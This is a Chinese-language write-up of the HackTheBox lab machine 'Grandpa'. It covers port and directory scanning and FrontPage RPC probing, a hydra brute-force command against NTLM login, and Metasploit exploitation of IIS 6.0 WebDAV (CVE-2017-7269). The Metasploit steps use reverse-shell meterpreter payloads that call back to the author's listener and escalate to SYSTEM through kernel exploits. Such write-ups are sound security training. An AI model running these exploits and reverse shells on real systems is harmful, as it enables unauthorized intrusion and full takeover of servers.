Grandpa是HackTheBox上的一个简单难度的Windows靶机。我自己实际做的时候纠结在FrontPage相关的漏洞利用上,几番尝试得到了一些信息,但没拿到foothold。从外部审视的角度看,太局限于已有信息了,一条道走到黑、也丧失了耐心,后面考虑将思路从深度优先调整广度优先

port scan

端口扫描:

uzi@kali ~/D/06_Wordlists> nmap -n --min-rate 2000 -T4 -p- --max-retries 10 -Pn 10.129.104.78
Starting Nmap 7.93 ( https://nmap.org ) at 2023-04-13 21:11 CST
Nmap scan report for 10.129.104.78
Host is up (0.20s latency).
Not shown: 65534 filtered tcp ports (no-response)
PORT   STATE SERVICE
80/tcp open  http

Nmap done: 1 IP address (1 host up) scanned in 104.34 seconds

扫描参数说明:

  • -n 不进行DNS解析
  • --min-rate 每秒钟最低的发包次数
  • -T4 4代表的是激进(aggressive)模式,假定在稳定、可靠的网络中进行扫描
  • -p- 扫描全端口

这里只识别到一个开放端口。

WEB 80

网站首页是Under Construction,返回包报文头如下:

HTTP/1.1 200 OK
Content-Length: 1433
Content-Type: text/html
Content-Location: http://10.129.104.78/iisstart.htm
Last-Modified: Fri, 21 Feb 2003 15:48:30 GMT
Accept-Ranges: bytes
ETag: "05b3daec0d9c21:300"
Server: Microsoft-IIS/6.0
MicrosoftOfficeWebServer: 5.0_Pub
X-Powered-By: ASP.NET
Date: Thu, 13 Apr 2023 13:15:06 GMT
Connection: close

WEB扫描

uzi@kali ~/D/0/ferobuster [1]> ./feroxbuster -u http://10.129.104.78/

 ___  ___  __   __     __      __         __   ___
|__  |__  |__) |__) | /  `    /  \ \_/ | |  \ |__
|    |___ |  \ |  \ | \__,    \__/ / \ | |__/ |___
by Ben "epi" Risher 🤓                 ver: 2.9.2
───────────────────────────┬──────────────────────
 🎯  Target Url            │ http://10.129.104.78/
 🚀  Threads               │ 50
 📖  Wordlist              │ /usr/share/seclists/Discovery/Web-Content/raft-medium-directories.txt
 👌  Status Codes          │ All Status Codes!
 💥  Timeout (secs)        │ 7
 🦡  User-Agent            │ feroxbuster/2.9.2
 🔎  Extract Links         │ true
 🏁  HTTP methods          │ [GET]
 🔃  Recursion Depth       │ 4
 🎉  New Version Available │ https://github.com/epi052/feroxbuster/releases/latest
───────────────────────────┴──────────────────────
 🏁  Press [ENTER] to use the Scan Management Menu™
──────────────────────────────────────────────────
404      GET       33l      199w     1635c Auto-filtering found 404-like response and created new filter; toggle off with --dont-filter
301      GET        2l       10w      151c http://10.129.104.78/images => http://10.129.104.78/images/
200      GET        1l       23w     3080c http://10.129.104.78/pagerror.gif
200      GET       39l      159w     1433c http://10.129.104.78/
403      GET        2l       15w      218c http://10.129.104.78/aspnet_client
403      GET       29l      188w     1529c http://10.129.104.78/_vti_log
403      GET       29l      188w     1529c http://10.129.104.78/_vti_cnf
403      GET       29l      188w     1529c http://10.129.104.78/_vti_pvt
403      GET       29l      188w     1529c http://10.129.104.78/_vti_txt
403      GET       29l      188w     1529c http://10.129.104.78/_private
301      GET        2l       10w      151c http://10.129.104.78/Images => http://10.129.104.78/Images/
301      GET        2l       10w      157c http://10.129.104.78/_vti_bin => http://10.129.104.78/%5Fvti%5Fbin/
301      GET        2l       10w      151c http://10.129.104.78/IMAGES => http://10.129.104.78/IMAGES/
403      GET        2l       15w      218c http://10.129.104.78/Aspnet_client
301      GET        2l       10w      170c http://10.129.104.78/%5Fvti%5Fbin/_vti_aut => http://10.129.104.78/%5Fvti%5Fbin/%5Fvti%5Faut/
403      GET       29l      188w     1529c http://10.129.104.78/_Private
403      GET        2l       15w      218c http://10.129.104.78/aspnet_Client
403      GET        2l       15w      218c http://10.129.104.78/ASPNET_CLIENT
403      GET       29l      188w     1529c http://10.129.104.78/_PRIVATE
403      GET       29l      188w     1529c http://10.129.104.78/_VTI_CNF
403      GET       29l      188w     1529c http://10.129.104.78/_VTI_PVT
403      GET       29l      188w     1529c http://10.129.104.78/_VTI_TXT
403      GET       29l      188w     1529c http://10.129.104.78/_VTI_LOG
301      GET        2l       10w      170c http://10.129.104.78/%5Fvti%5Fbin/_vti_adm => http://10.129.104.78/%5Fvti%5Fbin/%5Fvti%5Fadm/
400      GET        1l        4w       34c http://10.129.104.78/error%1F_log
400      GET        1l        4w       34c http://10.129.104.78/images/error%1F_log
400      GET        1l        4w       34c http://10.129.104.78/Images/error%1F_log
400      GET        1l        4w       34c http://10.129.104.78/%5Fvti%5Fbin/error%1F_log
400      GET        1l        4w       34c http://10.129.104.78/IMAGES/error%1F_log
[####################] - 4m    150012/150012  0s      found:28      errors:3339
[####################] - 4m     30000/30000   107/s   http://10.129.104.78/
[####################] - 4m     30000/30000   109/s   http://10.129.104.78/images/
[####################] - 4m     30000/30000   111/s   http://10.129.104.78/Images/
[####################] - 4m     30000/30000   111/s   http://10.129.104.78/%5Fvti%5Fbin/
[####################] - 2m     30000/30000   227/s   http://10.129.104.78/IMAGES/

WEB扫描结果显示存在大量_vti_开头的目录,以_vti_pvt进行搜索,发现使用了FrontPage,以此为基础进行相关漏洞搜索。

https://www.petenetlive.com/KB/Article/0000742

As it turns out these folders are needed for FrontPage and FrontPage Extensions. I CAN simply delete them, but since my web host provides me with cPanel access to the website, I can simply disable the extensions there, and this removes all the junk for me. (I don’t intend to use FrontPage).

FrontPage相关漏洞利用

Github deepak0401/Front-Page-Exploit

https://raw.githubusercontent.com/deepak0401/Front-Page-Exploit/master/README.md

使用payload进行测试:

/_vti_bin/shtml.dll/_vti_rpc提示没权限。

POST /_vti_bin/shtml.dll/_vti_rpc HTTP/1.1
Host: 10.129.104.78
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.5304.107 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 57

method=open+service%3a3%2e0%2e2%2e1105&service%5fname=%2f


<html><head><title>vermeer RPC packet</title></head>
<body>
<p>method=open service:3.0.2.1105
<p>status=
<ul>
<li>status=917505
<li>osstatus=0
<li>msg=The user '(unknown)' is not authorized to execute the 'open service' method.
<li>osmsg=
</ul>
</body>
</html>

得到FrontPage版本为5.0.2.6790

POST /_vti_bin/shtml.dll/_vti_rpc HTTP/1.1
Host: 10.129.104.78
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.5304.107 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 40

method=server+version%3a4%2e0%2e2%2e2611

<html><head><title>vermeer RPC packet</title></head>
<body>
<p>method=server version:4.0.2.2611
<p>server version=
<ul>
<li>major ver=5
<li>minor ver=0
<li>phase ver=2
<li>ver incr=6790
</ul>
<p>source control=1
</body>
</html>

_vti_inf.html

查看/_vti_inf.html得到一些信息

<body>
<!-- _vti_inf.html version 0.100>
<!-- 
	This file contains important information used by the FrontPage client
	(the FrontPage Explorer and FrontPage Editor) to communicate with the
	FrontPage server extensions installed on this web server.

	The values below are automatically set by FrontPage at installation.  Normally, you do not need to modify these values, but in case
	you do, the parameters are as follows:

	'FPShtmlScriptUrl', 'FPAuthorScriptUrl', and 'FPAdminScriptUrl' specify
	the relative urls for the scripts that FrontPage uses for remote
	authoring.  These values should not be changed.

	'FPVersion' identifies the version of the FrontPage Server Extensions
	installed, and should not be changed.
--><!-- FrontPage Configuration Information
    FPVersion="5.0.2.6790"
    FPShtmlScriptUrl="_vti_bin/shtml.dll/_vti_rpc"
    FPAuthorScriptUrl="_vti_bin/_vti_aut/author.dll"
    FPAdminScriptUrl="_vti_bin/_vti_adm/admin.dll"
    TPScriptUrl="_vti_bin/owssvr.dll"
-->
<p><!--webbot bot="PurpleText"
preview="This page is placed into the root directory of your FrontPage web when FrontPage is installed.  It contains information used by the FrontPage client to communicate with the FrontPage server extensions installed on this web server.  You should not delete this file."
--></p>

SPartan和sparty

SPartan和sparty都是扫描、攻击利用Frontpage的工具,都好久没更新了。两款工具都进行了简单测试,实际使用sparty更多一些。

工具使用起来没啥讲究的,挨个参数都尝试一遍就OK。
具体来说,

  1. 我自己使用时注释掉了sparty_v_0.1.py的第100~104行;
  2. 使用-e rpc_service_listing时得到了一些服务信息。
详细服务信息

method=list services:5.0.2.6790

services_list=

    • service_name=
    • meta_info=
      • vti_restartmanual
      • IX|0
      • vti_webservertype
      • SR|msiis
      • vti_textextensions
      • SX|.txt.txt.
      • vti_servercharsets
      • VX|windows-1257 big5 windows-1252 windows-1254 iso-8859-2 iso-8859-15 windows-874 shift_jis utf-8 windows-1251 windows-1256 euc-kr gb2312 windows-1253 windows-1258 koi8-r iso-2022-jp ks_c_5601-1987 windows-1250 windows-1255 euc-jp unicode unicodeFFFE
      • vti_hasglobalasa
      • BR|false
      • vti_timecreated
      • TR|12 Apr 2017 14:17:19 -0000
      • vti_oldestcompatibleversion
      • SR|2.0.0.0
      • vti_publishmetainfokeys
      • VR|vti_assignedto vti_approvallevel vti_categories vti_description
      • vti_textindexood
      • IR|0
      • vti_casesensitiveurls
      • IX|0
      • vti_authpasswdurl
      • SR|/_vti_bin/_vti_adm/fpadmdll.dll?page=pwdmgr.htm&ReturnPage=home
      • vti_htmlextensions
      • SX|.htm.html.html.htm.hxt.shtml.shtm.stm.htt.htx.asp.aspx.alx.asa.hta.htc.jsp.cfm.odc.dwt.
      • vti_approvallevels
      • VR|Approved Denied Pending\ Review
      • vti_hassearchbot
      • BR|false
      • vti_dependenciesood
      • IR|0
      • vti_welcomenames
      • VX|Default.htm Default.asp index.htm iisstart.htm Default.aspx
      • vti_adminurl
      • SR|/_vti_bin/_vti_adm/fpadmdll.dll
      • vti_servertz
      • SX|+0300
      • vti_featurelist
      • VX|vti_ACCreateNewUsers vti_ACChangePassword vti_ACNoUserGroup vti_ACCreateNewGroups vti_ACModifyGroups vti_ServiceMarkUrlDirExec vti_ACIPAddresses vti_ServerEmailTransport vti_ServerIndexServer vti_ServerCollab vti_TimedDocEvents
      • vti_categories
      • VR|Travel Expense\ Report Business Competition Goals/Objectives Ideas Miscellaneous Waiting VIP In\ Process Planning Schedule
      • vti_insecureserverurl
      • SR|http://10.129.198.216
      • vti_approvalapproved
      • SR|Approved
      • vti_approvaldenied
      • SR|Denied
      • vti_defaultcharset
      • SR|windows-1252
      • vti_autorecalc
      • IX|1
      • vti_httpdversion
      • SX|Microsoft-IIS/6.0
      • vti_serverlanguages
      • VX|en-us
      • vti_disableautoimgsizeexts
      • SX|.asp
      • vti_createpostinfo
      • BX|false
      • vti_extenderversion
      • SR|5.0.2.6790
      • vti_longfilenames
      • IX|1

详细信息里面引起我注意的是:

<li>vti_authpasswdurl
<li>SR|/_vti_bin/_vti_adm/fpadmdll.dll?page&#61;pwdmgr.htm&#38;ReturnPage&#61;home

WEB登录界面及NTLM爆破

访问上述URI,会提示需要登录,随易尝试后发现使用了NTLM进行验证。
使用hydra进行爆破无结果后,内心已放弃。

hydra  -l webmaster -P /usr/share/seclists/Passwords/xato-net-10-million-passwords-10000.txt "http-get://10.129.55.9/_vti_bin/_vti_adm/fpadmdll.dll?page=pwdmgr.htm&ReturnPage=home:A=NTLM:F=You are not authorized to view this page"

IIS 6.0漏洞

至此,查看官方题解,得知利用了CVE-2017-7269进行攻击,我比较好奇是怎么知道使用这个漏洞的,结果直接搜索microsoft iis 6.0 vulnerabilities,结果第一条就是这个漏洞的信息🙃。

网站返回包响应头的信息我基本忽略了。

HTTP/1.1 200 OK
Content-Length: 1433
Content-Type: text/html
Content-Location: http://10.129.104.78/iisstart.htm
Last-Modified: Fri, 21 Feb 2003 15:48:30 GMT
Accept-Ranges: bytes
ETag: "05b3daec0d9c21:300"
Server: Microsoft-IIS/6.0
MicrosoftOfficeWebServer: 5.0_Pub
X-Powered-By: ASP.NET
Date: Thu, 13 Apr 2023 13:15:06 GMT
Connection: close

关于CVE-2017-7269,在网上搜索,可以找到k0shl的分析文章:CVE-2017-7269 IIS6.0远程代码执行漏洞分析及Exploit

msf攻击

msf6 > search platform:windows iis 6.0

Matching Modules
================

   #  Name                                                 Disclosure Date  Rank    Check  Description
   -  ----                                                 ---------------  ----    -----  -----------
   0  exploit/windows/firewall/blackice_pam_icq            2004-03-18       great   No     ISS PAM.dll ICQ Parser Buffer Overflow
   1  exploit/windows/iis/iis_webdav_scstoragepathfromurl  2017-03-26       manual  Yes    Microsoft IIS WebDav ScStoragePathFromUrl Overflow


Interact with a module by name or index. For example info 1, use 1 or use exploit/windows/iis/iis_webdav_scstoragepathfromurl

msf6 > use 1
[*] No payload configured, defaulting to windows/meterpreter/reverse_tcp
msf6 exploit(windows/iis/iis_webdav_scstoragepathfromurl) > show options

Module options (exploit/windows/iis/iis_webdav_scstoragepathfromurl):

   Name           Current Setting  Required  Description
   ----           ---------------  --------  -----------
   MAXPATHLENGTH  60               yes       End of physical path brute force
   MINPATHLENGTH  3                yes       Start of physical path brute force
   Proxies                         no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS                          yes       The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html
   RPORT          80               yes       The target port (TCP)
   SSL            false            no        Negotiate SSL/TLS for outgoing connections
   TARGETURI      /                yes       Path of IIS 6 web application
   VHOST                           no        HTTP server virtual host


Payload options (windows/meterpreter/reverse_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  process          yes       Exit technique (Accepted: '', seh, thread, process, none)
   LHOST     192.168.70.128   yes       The listen address (an interface may be specified)
   LPORT     4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Microsoft Windows Server 2003 R2 SP2 x86



View the full module info with the info, or info -d command.

msf6 exploit(windows/iis/iis_webdav_scstoragepathfromurl) > set -g lhost tun0
lhost => tun0
msf6 exploit(windows/iis/iis_webdav_scstoragepathfromurl) > set -g rhosts 10.129.55.9
rhosts => 10.129.55.9
msf6 exploit(windows/iis/iis_webdav_scstoragepathfromurl) > run

[*] Started reverse TCP handler on 10.10.16.22:4444
[*] Trying path length 3 to 60 ...
[*] Exploit completed, but no session was created.
msf6 exploit(windows/iis/iis_webdav_scstoragepathfromurl) > run

[*] Started reverse TCP handler on 10.10.16.22:4444
[*] Trying path length 3 to 60 ...
[*] Exploit completed, but no session was created.
msf6 exploit(windows/iis/iis_webdav_scstoragepathfromurl) > run

[*] Started reverse TCP handler on 10.10.16.22:4444
[*] Trying path length 3 to 60 ...
[*] Exploit completed, but no session was created.
msf6 exploit(windows/iis/iis_webdav_scstoragepathfromurl) > set rhosts 10.129.213.72
rhosts => 10.129.213.72
msf6 exploit(windows/iis/iis_webdav_scstoragepathfromurl) > run

[*] Started reverse TCP handler on 10.10.16.22:4444
[*] Trying path length 3 to 60 ...
[*] Sending stage (175686 bytes) to 10.129.213.72
[*] Meterpreter session 1 opened (10.10.16.22:4444 -> 10.129.213.72:1030) at 2023-04-16 14:25:10 +0800

meterpreter > ps

Process List
============

 PID   PPID  Name               Arch  Session  User                          Path
 ---   ----  ----               ----  -------  ----                          ----
 0     0     [System Process]
 4     0     System
 272   4     smss.exe
 320   272   csrss.exe
 344   272   winlogon.exe
 392   344   services.exe
 404   344   lsass.exe
 584   392   svchost.exe
 668   392   svchost.exe
 732   392   svchost.exe
 764   392   svchost.exe
 796   392   svchost.exe
 988   392   spoolsv.exe
 1016  392   msdtc.exe
 1096  392   cisvc.exe
 1136  392   svchost.exe
 1192  392   inetinfo.exe
 1228  392   svchost.exe
 1340  392   VGAuthService.exe
 1400  392   vmtoolsd.exe
 1504  392   svchost.exe
 1616  392   svchost.exe
 1724  392   dllhost.exe
 1788  392   dllhost.exe
 1956  392   alg.exe
 1972  584   wmiprvse.exe       x86   0        NT AUTHORITY\NETWORK SERVICE  C:\WINDOWS\system32\wbem\wmiprvse.exe
 2116  392   vssvc.exe
 2184  1504  w3wp.exe           x86   0        NT AUTHORITY\NETWORK SERVICE  c:\windows\system32\inetsrv\w3wp.exe
 2292  584   davcdata.exe       x86   0        NT AUTHORITY\NETWORK SERVICE  C:\WINDOWS\system32\inetsrv\davcdata.exe
 2392  2184  rundll32.exe       x86   0                                      C:\WINDOWS\system32\rundll32.exe
 2576  584   wmiprvse.exe

meterpreter > migrate 2184
[*] Migrating from 2392 to 2184...
[*] Migration completed successfully.

迁移进程

这里有个迁移进程的操作migrate 2184,我实际测试,如果不迁移进程的话,后面local_exploit_suggester给出的提权建议模块,都不能成功使用。

报错是Rex::Post::Meterpreter::RequestError stdapi_sys_config_getsid: Operation failed: Access is denied.

关于迁移操作,官方题解的说明是:

At this point it is a good idea to migrate to a process running under ​NT AUTHORITY\NETWORK
SERVICE​. In this case ​davcdata.exe ​seemed to be the only stable process available.

另一篇题解https://www.rffuste.com/2020/08/31/htb-grandpa/里的说明是:

We’re working as the process rundll32.exe that it is not owned by network service that is who we are.
We should then migrate to a process owned by us.

msf6 exploit(windows/local/ms14_070_tcpip_ioctl) > use exploit/windows/local/ms15_051_client_copy_image
[*] No payload configured, defaulting to windows/meterpreter/reverse_tcp
msf6 exploit(windows/local/ms15_051_client_copy_image) > run

[*] Started reverse TCP handler on 10.10.16.22:4444
[-] Exploit failed: Rex::Post::Meterpreter::RequestError stdapi_sys_config_getsid: Operation failed: Access is denied.
[*] Exploit completed, but no session was created.
msf6 exploit(windows/local/ms15_051_client_copy_image) > set -g lport 4445
lport => 4445
msf6 exploit(windows/local/ms15_051_client_copy_image) > run

[*] Started reverse TCP handler on 10.10.16.22:4445
[-] Exploit failed: Rex::Post::Meterpreter::RequestError stdapi_sys_config_getsid: Operation failed: Access is denied.
[*] Exploit completed, but no session was created.
msf6 exploit(windows/local/ms15_051_client_copy_image) > set lhost tun0
lhost => tun0
msf6 exploit(windows/local/ms15_051_client_copy_image) > run

[*] Started reverse TCP handler on 10.10.16.22:4445
[-] Exploit failed: Rex::Post::Meterpreter::RequestError stdapi_sys_config_getsid: Operation failed: Access is denied.
[*] Exploit completed, but no session was created.
msf6 exploit(windows/local/ms15_051_client_copy_image) > use exploit/windows/local/ms10_015_kitrap0d
[*] Using configured payload windows/meterpreter/reverse_tcp
msf6 exploit(windows/local/ms10_015_kitrap0d) > run

[*] Started reverse TCP handler on 10.10.16.22:4445
[-] Exploit failed: Rex::Post::Meterpreter::RequestError stdapi_sys_config_getsid: Operation failed: Access is denied.
[*] Exploit completed, but no session was created.

提权

使用local_exploit_suggester模块进行搜索。

msf6 post(multi/recon/local_exploit_suggester) > run

[*] 10.129.55.9 - Collecting local exploits for x86/windows...
[*] 10.129.55.9 - 181 exploit checks are being tried...
[+] 10.129.55.9 - exploit/windows/local/ms10_015_kitrap0d: The service is running, but could not be validated.
[+] 10.129.55.9 - exploit/windows/local/ms14_058_track_popup_menu: The target appears to be vulnerable.
[+] 10.129.55.9 - exploit/windows/local/ms14_070_tcpip_ioctl: The target appears to be vulnerable.
[+] 10.129.55.9 - exploit/windows/local/ms15_051_client_copy_image: The target appears to be vulnerable.
[+] 10.129.55.9 - exploit/windows/local/ms16_016_webdav: The service is running, but could not be validated.
[+] 10.129.55.9 - exploit/windows/local/ppr_flatten_rec: The target appears to be vulnerable.
[*] Running check method for exploit 41 / 41
[*] 10.129.55.9 - Valid modules for session 1:
============================

 #   Name                                                           Potentially Vulnerable?  Check Result
 -   ----                                                           -----------------------  ------------
 1   exploit/windows/local/ms10_015_kitrap0d                        Yes                      The service is running, but could not be validated.
 2   exploit/windows/local/ms14_058_track_popup_menu                Yes                      The target appears to be vulnerable.
 3   exploit/windows/local/ms14_070_tcpip_ioctl                     Yes                      The target appears to be vulnerable.
 4   exploit/windows/local/ms15_051_client_copy_image               Yes                      The target appears to be vulnerable.
 5   exploit/windows/local/ms16_016_webdav                          Yes                      The service is running, but could not be validated.
 6   exploit/windows/local/ppr_flatten_rec                          Yes                      The target appears to be vulnerable.

官方题解里使用了ms14_070_tcpip_ioctl​进行提权,我用ms10_015_kitrap0d提权也成功了。
后来我测试前期到官方题解里的davcdata.exe进程,也能使用ms10_015_kitrap0d提权🤔。

msf6 exploit(windows/local/ms10_015_kitrap0d) > show options

Module options (exploit/windows/local/ms10_015_kitrap0d):

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   SESSION  1                yes       The session to run this module on


Payload options (windows/meterpreter/reverse_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  process          yes       Exit technique (Accepted: '', seh, thread, process, none)
   LHOST     tun0             yes       The listen address (an interface may be specified)
   LPORT     4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Windows 2K SP4 - Windows 7 (x86)



View the full module info with the info, or info -d command.

msf6 exploit(windows/local/ms10_015_kitrap0d) > run

[*] Started reverse TCP handler on 10.10.16.22:4444
[*] Reflectively injecting payload and triggering the bug...
[*] Launching msiexec to host the DLL...
[+] Process 2144 launched.
[*] Reflectively injecting the DLL into 2144...
[+] Exploit finished, wait for (hopefully privileged) payload execution to complete.
[*] Sending stage (175686 bytes) to 10.129.213.72
[*] Meterpreter session 2 opened (10.10.16.22:4444 -> 10.129.213.72:1031) at 2023-04-16 14:33:32 +0800

meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM

总结

总体来看,这个靶机难度确实是简单级别的,但是我自己做题过程却显得十分艰难。
按道理来说不应该花这么长时间,而且实际比赛、测试活动中应该也没有这么多时间霍霍。

就题目本身而言,感觉FrontPage部分像是一个陷阱。我在陷阱中越陷越深,这种感觉就像是我猜测它应该是什么样子的,然后在环境中进行验证,进一步加深了我这种猜测。后面我甚至搭建了测试环境,通过反编译看相关的dll文件,真是可笑。

在做HackTheBox的过程中遇到困难时,我时常有两方面的情绪:一方面是我究竟有没有真正做到Try Harder,另一方面是我究竟是不是在正确的路上、会不会方向压根就错了。

后面尝试的过程中得更加注重信息收集的广度,在投入精力猛攻之前多想想为什么是这个方向。

还有一点是看了k0shl的博客之后,我愈发觉得养成写东西的习惯真好。